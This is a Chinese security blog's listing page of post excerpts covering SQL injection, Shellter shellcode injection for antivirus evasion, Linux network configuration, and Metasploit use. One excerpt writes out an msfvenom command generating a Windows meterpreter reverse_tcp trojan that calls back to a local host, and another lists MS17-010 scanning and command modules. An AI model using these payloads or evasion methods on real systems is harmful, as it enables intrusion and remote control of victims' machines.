摘要: 0x01 什么是SQL注入 SQL是一种注入攻击,通过前端带入后端数据库进行恶意的SQL语句查询。 0x02 SQL整型注入原理 SQL注入一般发生在动态网站URL地址里,当然也会发生在其它地发,如登录框等等也会存在注入,只要是和数据库打交道的地方都有可能存在。 如这里http://192.168. 阅读全文
posted @ 2020-08-08 19:21 We3sT 阅读(743) 评论(0) 推荐(1) 编辑
摘要: Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀 官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在li 阅读全文
posted @ 2020-05-18 21:25 We3sT 阅读(12970) 评论(2) 推荐(2) 编辑
摘要: 在Ubuntu18.04中,传统的配置/etc/network/interfaces已无用,新的网络配置文件在:/etc/netplan/50-cloud-init.yaml 用vim进行编辑文件 注意格式 冒号后边有个空格 network: ethernets: ens33: dhcp4: fal 阅读全文
posted @ 2020-05-17 13:43 We3sT 阅读(1866) 评论(0) 推荐(0) 编辑
摘要: Centos网络IP地址配置文件在 /etc/sysconfig/network-scripts 文件夹下,ifcfg-ens33 //ens33是你当前的网卡名称 这个就是要修改的配置文件 对配置文件默认的设置进行编辑 vim ifcfg-ens33 TYPE=Ethernet PROXY_MET 阅读全文
posted @ 2020-05-13 08:53 We3sT 阅读(8402) 评论(0) 推荐(0) 编辑
摘要: 生成反弹木马: 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件 2. msfvenom -p android/meterpreter/revers 阅读全文
posted @ 2020-05-12 14:22 We3sT 阅读(3444) 评论(1) 推荐(0) 编辑
摘要: 很久没搞过这个玩意了,今天看了叫什么三 丰 云,免费云服务器 用来做一些小测试还是可以的 https://www.sanfengyun.com 阅读全文
posted @ 2019-05-28 08:23 We3sT 阅读(344) 评论(0) 推荐(0) 编辑
摘要: 1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 阅读全文
posted @ 2019-04-14 19:38 We3sT 阅读(2011) 评论(0) 推荐(0) 编辑
摘要: PHP获取表单值: $_POST //获取POST提交 $_GET // 获取GET提交 阅读全文
posted @ 2019-04-12 11:24 We3sT 阅读(523) 评论(0) 推荐(1) 编辑
摘要: 时间过的真快,转眼就快到18年底了,然而还是没有挣到多少钱。心塞,欠了一屁股债,伤不起。最近在帮某公司做售后服务,刚没去多久,还不是很熟悉店里的情况。貌似前台小妹妹脾气不怎么好, 这不让碰那不让碰的,谁叫她是老板的妹呢~哈...好多客户来修机器都被她弄跑了呀。厉害厉害...于是便有了此文... 先f 阅读全文
posted @ 2018-12-15 13:37 We3sT 阅读(1649) 评论(0) 推荐(3) 编辑
摘要: kali Linux的主版本自带的是Gnome桌面环境,安装后使用效率太低,不知道是不是我机器配置低的原因, 在虚拟机里运行起来太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux,并且backbox linux 默认的桌面环境是XFce, 所以渐渐的喜欢上了XFce,昨天无聊去官网 阅读全文
posted @ 2016-09-03 17:30 We3sT 阅读(13410) 评论(1) 推荐(1) 编辑